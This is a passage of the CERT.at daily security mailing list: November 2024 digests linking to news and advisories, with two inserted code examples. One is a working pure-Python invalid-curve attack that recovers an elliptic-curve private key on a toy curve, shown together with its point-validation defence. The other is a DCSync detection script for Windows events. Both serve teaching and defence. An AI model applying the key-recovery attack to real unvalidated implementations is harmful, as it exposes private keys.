∗∗∗ #StopRansomware: Black Basta ∗∗∗
---------------------------------------------
Updates to this advisory, originally published May 10, 2024 [..] The advisory was updated to reflect new TTPs employed by Black Basta affiliates, as well as provide current IOCs/remove outdated IOCs for effective threat hunting.
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a
∗∗∗ Cyberattack causes credit card readers to malfunction in Israel ∗∗∗
---------------------------------------------
As reported by the Jerusalem Post, the cause was a distributed denial-of-service attack (DDoS) that targeted the payment gateway company Hyp’s CreditGuard product. The attack disrupted communications between the card terminals and the wider payment system, but was not capable of stealing information or payments.
---------------------------------------------
https://therecord.media/cyberattack-causes-credit-card-readers-in-israel-to…
∗∗∗ Malware Steals Account Credentials ∗∗∗
---------------------------------------------
It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. [..] However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. We’ll explore one such case.
---------------------------------------------
https://blog.sucuri.net/2024/11/malware-steals-account-credentials.html
∗∗∗ Known Attacks On Elliptic Curve Cryptography ∗∗∗
---------------------------------------------
In recent years the Elliptic Curve Cryptography approach has become popular due to its high efficiency and strong security. The purpose of this article is to present this topic in a relatively clearer way than it exists today on the internet.
---------------------------------------------
https://github.com/elikaski/ECC_Attacks
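Among the attacks the ECC_Attacks write-up covers is the invalid-curve attack. As an added example that is not part of that repository, the pure-Python code below carries it through on a constructed toy curve y^2 = x^3 + 2x + 3 over F_97 with a constructed private scalar of 43: the affine addition formulas never use the curve constant b, so a victim that multiplies its secret into an unvalidated point is really computing on a curve of the attacker's choosing. Points of small prime order on those curves leak the secret modulo each prime, and the Chinese remainder theorem reassembles it. The last functions show the point validation that stops the attack. All parameters, function names and the brute-force searches are assumptions made for the toy size.

```python
# Constructed toy parameters: E: y^2 = x^3 + A*x + B over F_97 and a private scalar.
# Far too small for real use; chosen so every search below is a quick brute force.
P, A, B = 97, 2, 3
SECRET_D = 43


def add(p1, p2, a, p):
    """Affine point addition; None is the point at infinity. Note that b never appears."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % p == 0:          # p2 == -p1 (also covers doubling a point with y == 0)
            return None
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def mul(k, pt, a, p):
    """Double-and-add scalar multiplication."""
    acc = None
    while k:
        if k & 1:
            acc = add(acc, pt, a, p)
        pt = add(pt, pt, a, p)
        k >>= 1
    return acc


def is_on_curve(pt, a, b, p):
    return pt is not None and (pt[1] ** 2 - pt[0] ** 3 - a * pt[0] - b) % p == 0


def curve_order(a, b, p):
    """#E(F_p) including infinity, via the Legendre symbol of the right-hand side."""
    n = 1
    for x in range(p):
        rhs = (x ** 3 + a * x + b) % p
        n += 1 if rhs == 0 else (2 if pow(rhs, (p - 1) // 2, p) == 1 else 0)
    return n


def points(a, b, p):
    return [(x, y) for x in range(p) for y in range(p) if is_on_curve((x, y), a, b, p)]


def find_point_of_order(r, a, p, exclude_b):
    """A point of prime order r on some curve y^2 = x^3 + a*x + b2 with b2 != exclude_b."""
    for b2 in range(p):
        if b2 == exclude_b or (4 * a ** 3 + 27 * b2 * b2) % p == 0:  # skip the real and singular curves
            continue
        n2 = curve_order(a, b2, p)
        if n2 % r:
            continue
        m = n2
        while m % r == 0:
            m //= r                      # m * pt then has order a power of r
        for pt in points(a, b2, p):
            q = mul(m, pt, a, p)
            while q is not None and mul(r, q, a, p) is not None:
                q = mul(r, q, a, p)      # reduce to order exactly r
            if q is not None:
                return q
    return None


def validate_point(pt, a, b, p, subgroup_order):
    """The check the careless victim lacks: on the curve, not infinity, in the expected subgroup.
    For a cofactor curve pass the generator's prime order rather than #E."""
    return is_on_curve(pt, a, b, p) and mul(subgroup_order, pt, a, p) is None


def careless_victim(q):
    """Static-key exchange that multiplies the secret into whatever point it is handed."""
    return mul(SECRET_D, q, A, P)


def careful_victim(q):
    if not validate_point(q, A, B, P, curve_order(A, B, P)):
        raise ValueError("public point rejected")
    return mul(SECRET_D, q, A, P)


def crt(residues, moduli):
    """Chinese remainder theorem for pairwise coprime moduli."""
    x, m = 0, 1
    for r, n in zip(residues, moduli):
        x += m * (((r - x) * pow(m, -1, n)) % n)
        m *= n
    return x % m


def invalid_curve_attack(victim, a, b, p):
    """Recover the victim's scalar from d*Q for attacker-chosen small-order points Q."""
    n = curve_order(a, b, p)             # public curve, so the attacker knows d < n
    residues, moduli, prod, r = [], [], 1, 2
    while prod <= n:
        if r > 2 * p:
            raise RuntimeError("ran out of usable primes")
        q = find_point_of_order(r, a, p, exclude_b=b)
        if q is not None:
            shared = victim(q)           # equals (d mod r) * q because q has order r
            t = next(t for t in range(r) if mul(t, q, a, p) == shared)
            residues.append(t)
            moduli.append(r)
            prod *= r
        r = next(c for c in range(r + 1, 2 * r + 1)
                 if all(c % d for d in range(2, int(c ** 0.5) + 1)))
    return crt(residues, moduli)


if __name__ == "__main__":
    print("recovered d =", invalid_curve_attack(careless_victim, A, B, P), "real d =", SECRET_D)
```

Two things change at real sizes but not in principle: a protocol usually returns only the x-coordinate of the shared point, so each prime yields ±t and the attacker tries both combinations, and the attacker precomputes the small-order points offline instead of brute-forcing curves. The defence stays the same one-liner: reject any received point that is not on the named curve or not in the generator's prime-order subgroup, before the secret scalar ever touches it.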
∗∗∗ Pishi: Coverage guided macOS KEXT fuzzing ∗∗∗
---------------------------------------------
In this blog post I will try to explain everything as clearly as possible so that even those who are not familiar with fuzzing can enjoy and understand it. I’ll break down the concepts, provide relatable examples and resources. My goal is to make fuzzing approachable and interesting.
---------------------------------------------
https://r00tkitsmm.github.io/fuzzing/2024/11/08/Pishi.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Veeam Backup Enterprise Manager: unauthorised access by attackers possible ∗∗∗
---------------------------------------------
If attackers successfully exploit the vulnerability (CVE-2024-40715, rated "high"), they can bypass authentication and eavesdrop on connections as a man-in-the-middle. How this could work in detail is not yet known. [..] A security patch is available for download.
---------------------------------------------
https://www.heise.de/-10018234.html
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (podman), Debian (guix, libarchive, and nss), Fedora (expat, iaito, opendmarc, python-werkzeug, radare2, squid, and xorg-x11-server), Mageia (htmldoc, libheif, nspr, nss, firefox & rust, python-urllib3, python-werkzeug, quictls, ruby-webrick, and thunderbird), Oracle (firefox and NetworkManager-libreswan), SUSE (apache2, chromedriver, chromium, coredns, expat, govulncheck-vulndb, httpcomponents-client, java-17-openjdk, java-21-openjdk, libheif, python-wxPython, python311, python312, qbittorrent, ruby3.3-rubygem-actionmailer, ruby3.3-rubygem-actiontext, ruby3.3-rubygem-puma, ruby3.3-rubygem-rails, and virtualbox), and Ubuntu (openjdk-17, openjdk-21, openjdk-8, openjdk-lts, and qemu).
---------------------------------------------
https://lwn.net/Articles/997774/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 07-11-2024 18:00 − Friday 08-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Google To Make MFA Mandatory for Google Cloud in 2025 ∗∗∗
---------------------------------------------
Google has recently announced that it plans to implement mandatory multi-factor authentication (MFA) on all Cloud accounts by the end of 2025. [..] The implementation will affect both admins and users with access to Google Cloud. General consumer Google accounts will not be affected.
---------------------------------------------
https://heimdalsecurity.com/blog/google-cloud-mfa/
∗∗∗ 2024 Credit Card Theft Season Arrives ∗∗∗
---------------------------------------------
In today’s post we’re going to perform a malware analysis of the most common MageCart injections identified so that eCommerce website owners can better understand the risks, and (hopefully) protect themselves, their websites, and their customers from attackers.
---------------------------------------------
https://blog.sucuri.net/2024/11/2024-credit-card-theft-season-arrives.html
∗∗∗ ESET APT Activity Report Q2 2024–Q3 2024 ∗∗∗
---------------------------------------------
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2024 and Q3 2024
---------------------------------------------
https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q2…
∗∗∗ Helldown Ransomware Group – A New Emerging Ransomware Threat ∗∗∗
---------------------------------------------
As of November 2024, the online resources available related to the Helldown ransomware group’s Tactics, Techniques and Procedures (TTPs) were effectively non-existent – this blogpost aims to address that and will be updated continuously as more investigations are completed.
---------------------------------------------
https://www.truesec.com/hub/blog/helldown-ransomware-group
∗∗∗ TLPT & ME: Everything you need to know about Threat-Led Penetration Testing (TLPT) in a TIBER world. ∗∗∗
---------------------------------------------
While the TLPT RTS does come with some additional requirements or nuances compared to the TIBER framework, we can all be certain that adopting TIBER is indeed the way to fulfill DORA’s TLPT requirements. As mentioned in our initial post, we expect many more European countries to publish a TIBER implementation guide and/or a TIBER-EU 2.0 to be published for additional convergence.
---------------------------------------------
https://blog.nviso.eu/2024/11/08/tlpt-me-everything-you-need-to-know-about-…
∗∗∗ Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations ∗∗∗
---------------------------------------------
Discover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as Zingdoor and Snappybee, for its campaigns.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-…
∗∗∗ Defending Your Directory: An Expert Guide to Securing Active Directory Against DCSync Attacks ∗∗∗
---------------------------------------------
Last time we took a dive deep into Kerberoasting. Up next, let's unravel the sinister secrets of DCSync attacks - a stealthy technique that can bring your entire Active Directory to its knees.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
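The NCC Group post above is about defending against DCSync. On the wire, DCSync is nothing more than a directory replication request, so the detection side reduces to one question: which security principal was granted the replication control-access rights, and was it a domain controller? The following is an added example and not code from that post: it evaluates constructed Windows Security-log 4662 events ("An operation was performed on an object") and reports replication rights exercised by anyone outside an allowlist. The three GUIDs are the real schema GUIDs of the replication rights; the domain, account names, allowlist and event layout are assumptions.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Control-access rights that a replication partner needs; a DCSync asks for these.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)

# Constructed allowlist: domain controller machine accounts plus the Entra Connect sync
# account. In production derive this from the Domain Controllers OU, not by hand.
ALLOWED_REPLICATORS = {"CORP\\DC01$", "CORP\\DC02$", "CORP\\MSOL_0f1e2d3c4b5a"}

# Constructed sample events, flattened to one line per event; %%7688 is "Control Access".
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "AccessMask": "0x10",
     "Properties": "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}"},   # plain read of a user object
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe"},
]


def replication_rights(event: Dict[str, object]) -> List[str]:
    """Names of the replication rights listed in a 4662 event's Properties field, if any."""
    if event.get("EventID") != 4662:
        return []
    guids = GUID.findall(str(event.get("Properties", "")))
    return [REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events: Iterable[Dict[str, object]],
                  allowed=ALLOWED_REPLICATORS) -> List[Tuple[str, List[str]]]:
    """(actor, rights) for every replication request from a principal not on the allowlist."""
    findings = []
    for ev in events:
        rights = replication_rights(ev)
        if not rights:
            continue
        actor = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if actor not in allowed:
            findings.append((actor, rights))
    return findings


if __name__ == "__main__":
    for actor, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {actor}: {', '.join(rights)}")
```

Two caveats a practitioner needs: 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain naming context carries a SACL that covers these rights, so confirm the events exist before trusting the rule; and the allowlist has to be reviewed whenever a DC is promoted or a sync account is added, otherwise the first hit after a change is a false positive rather than an intrusion.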
∗∗∗ Nameless and shameless: Ransomware Encryption via BitLocker ∗∗∗
---------------------------------------------
This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/nameless-and-shameless-ransomware…
∗∗∗ Unmasking Phishing: Strategies for identifying 0ktapus domains and beyond ∗∗∗
---------------------------------------------
Wiz Research looks at phishing tactics, along with how to trace and investigate these campaigns.
---------------------------------------------
https://www.wiz.io/blog/unmasking-phishing-strategies-for-identifying-0ktap…
=====================
= Vulnerabilities =
=====================
∗∗∗ Max-Critical Cisco Bug Enables Command-Injection Attacks ∗∗∗
---------------------------------------------
Although Cisco reports no known malicious exploitation attempts, a CVSS 10 out of 10 security vulnerability (CVE-2024-20418) leaves three of its wireless access points open to remote, unauthenticated attacks.
---------------------------------------------
https://www.darkreading.com/vulnerabilities-threats/cisco-bug-command-injec…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (edk2), Debian (webkit2gtk), Fedora (thunderbird), Oracle (bzip2, container-tools:ol8, edk2, go-toolset:ol8, libtiff, python-idna, python3.11, and python3.12), Slackware (expat), and SUSE (apache2, govulncheck-vulndb, grub2, java-1_8_0-openjdk, python3, python39, qemu, xorg-x11-server, and xwayland).
---------------------------------------------
https://lwn.net/Articles/997480/
∗∗∗ Delta Electronics DIAScreen ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-312-02
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 06-11-2024 18:00 − Thursday 07-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers increasingly use Winos4.0 post-exploitation kit in attacks ∗∗∗
---------------------------------------------
Hackers are increasingly targeting Windows users with the malicious Winos4.0 framework, distributed via seemingly benign game-related apps.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-increasingly-use-win…
∗∗∗ A look at the latest post-quantum signature standardization candidates ∗∗∗
---------------------------------------------
NIST has standardized four post-quantum signature schemes so far, and they’re not done yet: there are fourteen new candidates in the running for standardization. In this blog post we take ..
---------------------------------------------
https://blog.cloudflare.com/another-look-at-pq-signatures
∗∗∗ The Power of Process in Creating a Successful Security Posture ∗∗∗
---------------------------------------------
Establishing realistic, practitioner-driven processes prevents employee burnout, standardizes experiences, and closes many of the gaps exposed by repeated one-offs.
---------------------------------------------
https://www.darkreading.com/cybersecurity-operations/process-in-creating-su…
∗∗∗ Microsoft Windows Server 2025 Upgrade Triggers Licensing Conflicts and Operational Fallout ∗∗∗
---------------------------------------------
A recent Microsoft update has unexpectedly forced several organizations to upgrade from Windows Server 2022 to Windows Server 2025, resulting in unexpected licensing demands and operational setbacks. First reported on November 5, 2024, this incident has affected organizations ..
---------------------------------------------
https://heimdalsecurity.com/blog/microsoft-windows-server-2025-upgrade/
∗∗∗ Steam Account Checker Poisoned with Infostealer ∗∗∗
---------------------------------------------
I found an interesting script targeting Steam users. Steam is a popular digital distribution platform for purchasing, downloading, and playing video games on personal computers. The script is called "steam-account-checker" ..
---------------------------------------------
https://isc.sans.edu/forums/diary/Steam+Account+Checker+Poisoned+with+Infos…
∗∗∗ China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait ∗∗∗
---------------------------------------------
The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an organization in the region. "During this attack, the threat ..
---------------------------------------------
https://thehackernews.com/2024/11/china-aligned-mirrorface-hackers-target.h…
∗∗∗ North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS ∗∗∗
---------------------------------------------
A threat actor with ties to the Democratic People's Republic of Korea (DPRK) has been observed targeting cryptocurrency-related businesses with a multi-stage malware capable of infecting Apple macOS devices. Cybersecurity company SentinelOne, ..
---------------------------------------------
https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html
∗∗∗ Office on Windows 11 24H2 brought to a halt with Crowdstrike installed ∗∗∗
---------------------------------------------
Anyone running Crowdstrike security software who updated to Windows 11 24H2 may have had to contend with apps that no longer worked.
---------------------------------------------
https://www.heise.de/news/Crowdstrike-legte-Office-unter-Windows-11-24H2-la…
∗∗∗ Large eBay malvertising campaign leads to scams ∗∗∗
---------------------------------------------
Consumers are being swamped by Google ads claiming to be eBay's customer service.
---------------------------------------------
https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-cam…
∗∗∗ Beware of fake Willhaben e-mails ∗∗∗
---------------------------------------------
Criminals are impersonating Willhaben and sending fake e-mails en masse. The e-mails, some of which look genuine, claim that you must confirm your identity or that you are due a refund. Another fake e-mail supposedly carries an invoice as an attachment. We advise caution!
---------------------------------------------
https://www.watchlist-internet.at/news/willhaben-phishing/
∗∗∗ Silent Skimmer Gets Loud (Again) ∗∗∗
---------------------------------------------
We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of ...
---------------------------------------------
https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/
∗∗∗ Unwrapping the emerging Interlock ransomware attack ∗∗∗
---------------------------------------------
Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game ..
---------------------------------------------
https://blog.talosintelligence.com/emerging-interlock-ransomware/
∗∗∗ Androxgh0st Botnet Integrates Mozi, Expands Attacks on IoT Vulnerabilities ∗∗∗
---------------------------------------------
CloudSEK reports that the Androxgh0st botnet has integrated with the Mozi botnet and ..
---------------------------------------------
https://hackread.com/androxgh0st-botnet-integrate-mozi-iot-vulnerabilities/
∗∗∗ Malicious Python Package Typosquats Popular fabric SSH Library, Exfiltrates AWS Credentials ∗∗∗
---------------------------------------------
The Socket Research Team has discovered a malicious Python package, fabrice, that is typosquatting the popular fabric SSH automation library. The threat of malware delivered through typosquatted libraries remains a significant ..
---------------------------------------------
https://socket.dev/blog/malicious-python-package-typosquats-fabric-ssh-libr…
=====================
= Vulnerabilities =
=====================
∗∗∗ Numerous vulnerabilities in HASOMED Elefant and Elefant Software Updater ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 05-11-2024 18:00 − Wednesday 06-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Germany drafts law to protect researchers who find security flaws ∗∗∗
---------------------------------------------
The Federal Ministry of Justice in Germany has drafted a law to provide legal protection to security researchers who discover and responsibly report security vulnerabilities to vendors.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/germany-drafts-law-to-protec…
∗∗∗ Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems ∗∗∗
---------------------------------------------
SANS recently published its 2024 State of ICS/OT Cybersecurity report, highlighting the skills of cyber professionals working in critical infrastructure, budget estimates, and emerging technologies. The report ..
---------------------------------------------
https://www.darkreading.com/ics-ot-security/attackers-breach-network-provid…
∗∗∗ Consumer advocates warn: smart air fryers eavesdrop and send data to China ∗∗∗
---------------------------------------------
Consumer advocates have uncovered data protection problems in various smart devices. Right at the front of the pack: hot-air fryers!
---------------------------------------------
https://www.golem.de/news/verbraucherschuetzer-warnen-smarte-fritteusen-lau…
∗∗∗ New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency ∗∗∗
---------------------------------------------
Kaspersky experts have discovered a new SteelFox Trojan that mimics popular software like Foxit PDF Editor and JetBrains to spread a stealer-and-miner bundle.
---------------------------------------------
https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/
∗∗∗ INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime ∗∗∗
---------------------------------------------
INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation. Dubbed Operation Synergia II, the coordinated effort ran from April 1 to ..
---------------------------------------------
https://thehackernews.com/2024/11/interpols-operation-synergia-ii.html
∗∗∗ Attackers use an emulated Linux environment as a backdoor ∗∗∗
---------------------------------------------
IT security researchers have discovered an unusual type of attack: the perpetrators set up an emulated Linux environment as a backdoor.
---------------------------------------------
https://www.heise.de/news/CRON-TRAP-Emulierte-Linux-Umgebung-als-Backdoor-n…
∗∗∗ Canadian Man Arrested in Snowflake Data Extortions ∗∗∗
---------------------------------------------
A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake. On October 30, Canadian authorities arrested Alexander Moucka, a.k.a. Connor Riley Moucka of Kitchener, Ontario, on a provisional arrest warrant from the United States. Bloomberg first ..
---------------------------------------------
https://krebsonsecurity.com/2024/11/canadian-man-arrested-in-snowflake-data…
∗∗∗ You lost your iPhone, but it’s locked. That’s fine, right? ∗∗∗
---------------------------------------------
TL;DR: The default iOS configuration leaves your locked device vulnerable. Ensure your emergency contacts are set. Use ‘FindMy’ to track / wipe lost devices. Take regular backups. Consider turning off the ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/you-lost-your-iphone-but-its-…
∗∗∗ Deceptive payment instruction: is this e-mail really from your boss? ∗∗∗
---------------------------------------------
From the accounting department of an international corporation to the administration of the small business next door: recently, more and more employees have been receiving fraudulent e-mails in the name of management ..
---------------------------------------------
https://www.watchlist-internet.at/news/tueckische-zahlungsanweisung-chef/
∗∗∗ Guidance for brands to help advertising partners counter malvertising ∗∗∗
---------------------------------------------
Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud.
---------------------------------------------
https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-count…
∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗
---------------------------------------------
The popular NPM package @lottiefiles/lottie-player enables developers to seamlessly integrate Lottie animations into websites and applications. On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to ..
---------------------------------------------
https://checkmarx.com/uncategorized/with-2fa-enabled-npm-package-lottie-pla…
∗∗∗ CopyRh(ight)adamantys Campaign: Rhadamantys Exploits Intellectual Property Infringement Baits ∗∗∗
---------------------------------------------
While we finalized this blog post, a technical analysis of this activity was published by fellow researchers from Cisco Talos. While it overlaps with our findings to some extent, our report provides additional extended information about the activity. [..] Since July 2024, Check Point Research (CPR) has been tracking an extensive a..
---------------------------------------------
https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-late…
∗∗∗ (In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments ∗∗∗
---------------------------------------------
The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-per…
∗∗∗ Threat Campaign Spreads Winos4.0 Through Game Application ∗∗∗
---------------------------------------------
FortiGuard Labs reveals a threat actor spreading Winos4.0, infiltrating gaming apps and targeting the education sector.
---------------------------------------------
https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos…
∗∗∗ Defending Your Directory: An Expert Guide to Combating Kerberoasting in Active Directory ∗∗∗
---------------------------------------------
16 hours or less, that’s all it takes for attackers to gain access to Microsoft Active Directory (AD) and unleash mayhem on your organization. If that attack happens on a Friday afternoon, they have all weekend to wreak havoc, escalating their privileges, deploying ransomware, exploiting your VPN, or exfiltrating your data. ..
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) could allow an authenticated, remote attacker with low privileges to conduct a stored ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (libtiff), Debian (context, libheif, and thunderbird), Fedora (php-tcpdf, syncthing, and thunderbird), Gentoo (EditorConfig core C library, Flatpak, Neat VNC, and Ubiquiti UniFi), Oracle (bcc, bpftrace, grafana-pcp, haproxy, kernel, krb5, libtiff, python-gevent, python3.11-urllib3, python3.12-urllib3, and xmlrpc-c), ..
---------------------------------------------
https://lwn.net/Articles/997182/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 04-11-2024 18:00 − Tuesday 05-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Windows Server 2025 released—here are the new features ∗∗∗
---------------------------------------------
Microsoft has announced that Windows Server 2025, the latest version of its server operating system, is generally available starting Friday, November 1st.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-server-2025-release…
∗∗∗ Nokia investigates breach after hacker claims to steal source code ∗∗∗
---------------------------------------------
Nokia is investigating whether a third-party vendor was breached after a hacker claimed to be selling the company's stolen source code.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/nokia-investigates-breach-af…
∗∗∗ Google fixes two Android zero-days used in targeted attacks ∗∗∗
---------------------------------------------
Google fixed two actively exploited Android zero-day flaws as part of its November security updates, addressing a total of 51 vulnerabilities.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zer…
∗∗∗ Attack on Schneider Electric: hungry hackers demand baguettes as ransom ∗∗∗
---------------------------------------------
The attackers claim to have exfiltrated more than 40 GB of data from Schneider Electric. Their demand: 125,000 US dollars in the form of baguettes.
---------------------------------------------
https://www.golem.de/news/angriff-auf-schneider-electric-hungrige-hacker-fo…
∗∗∗ Olympia POS systems: cash registers without security updates for three years ∗∗∗
---------------------------------------------
Olympia-brand cash registers run on Android 11 and pose risks to payment transactions.
---------------------------------------------
https://www.golem.de/news/olympia-kassensysteme-registrierkassen-seit-drei-…
∗∗∗ Python RAT with a Nice Screensharing Feature ∗∗∗
---------------------------------------------
While hunting, I found another interesting Python RAT in the wild. This is not brand new because the script was released two years ago. The script I found is based on the same tool and still ..
---------------------------------------------
https://isc.sans.edu/diary/Python+RAT+with+a+Nice+Screensharing+Feature/314…
∗∗∗ Maritime lawyers assemble! ∗∗∗
---------------------------------------------
Maritime cyber insurance has been playing catch-up with maritime cyber security for a while now. It was all pretty good until the availability of cheap VSAT meant that ships ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/maritime-lawyers-assemble/
∗∗∗ In final check-in before Election Day, CISA cites low-level threats, and not much else ∗∗∗
---------------------------------------------
Incidents to date have included “low level” distributed denial-of-service activity, criminal destruction of ballot drop boxes and continued threats targeting election officials, CISA Director Jen Easterly ..
---------------------------------------------
https://therecord.media/cisa-2024-presidential-election-threats
∗∗∗ Making smart cities resilient against cyberattacks ∗∗∗
---------------------------------------------
Whether we like it or not, cities worldwide are turning into so-called "smart cities". Their proponents promise innovation, sustainability and digital growth. But this infrastructure, or rather the ..
---------------------------------------------
https://www.borncity.com/blog/2024/11/05/smart-cities-gegen-cyberattacken-r…
∗∗∗ SOC Around the Clock: World Tour Survey Findings ∗∗∗
---------------------------------------------
Trend surveyed 750 cybersecurity professionals in 49 countries to learn more about the state of ..
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/k/world-tour-survey-results.ht…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, openexr, and thunderbird), Fedora (llama-cpp and python-quart), Oracle (firefox, openexr, thunderbird, and xorg-x11-server and xorg-x11-server-Xwayland), SUSE (chromium, govulncheck-vulndb, openssl-1_1, python311, and python312), and Ubuntu (linux-azure, linux-bluefield, linux-azure, linux-gcp, linux-ibm, openjpeg2, and ruby3.0, ruby3.2, ruby3.3).
---------------------------------------------
https://lwn.net/Articles/997030/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 31-10-2024 18:00 − Monday 04-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Thousands of hacked TP-Link routers used in years-long account takeover attacks ∗∗∗
